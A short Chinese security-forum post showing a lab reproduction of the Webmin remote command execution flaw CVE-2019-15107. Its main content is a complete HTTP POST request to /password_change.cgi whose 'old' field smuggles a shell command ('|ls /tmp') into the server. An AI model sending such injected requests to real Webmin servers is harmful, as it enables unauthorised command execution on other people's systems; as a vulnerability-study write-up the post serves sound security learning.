安全矩阵

 找回密码
 立即注册
搜索
查看: 1286|回复: 0

Webmin远程命令执行漏洞(CVE-2019-15107)

[复制链接]

63

主题

125

帖子

457

积分

中级会员

Rank: 3Rank: 3

积分
457
发表于 2021-10-13 17:49:13 | 显示全部楼层 |阅读模式
查了一下,发现webmin的cve挺多的
打开网址



出现这个
随便输个账号密码然后抓包
抓取数据包,修改数
据,利用poc进行验证


POST /password_change.cgi HTTP/1.1
Host: 192.168.1.190:13619
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:79.0) Gecko/20100101 Firefox/79.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2 Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 65
Origin: https://192.168.1.190:13619 Connection: close Referer: https://192.168.1.190:13619/
Cookie: redirect=1; testing=1
Upgrade-Insecure-Requests: 1 user=rootxx&pam=&expired=2&old=test|ls /tmp&new1=test2&new2=test2

回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

小黑屋|安全矩阵

GMT+8, 2024-9-8 12:19 , Processed in 0.013772 second(s), 18 queries .

Powered by Discuz! X4.0

Copyright © 2001-2020, Tencent Cloud.

快速回复 返回顶部 返回列表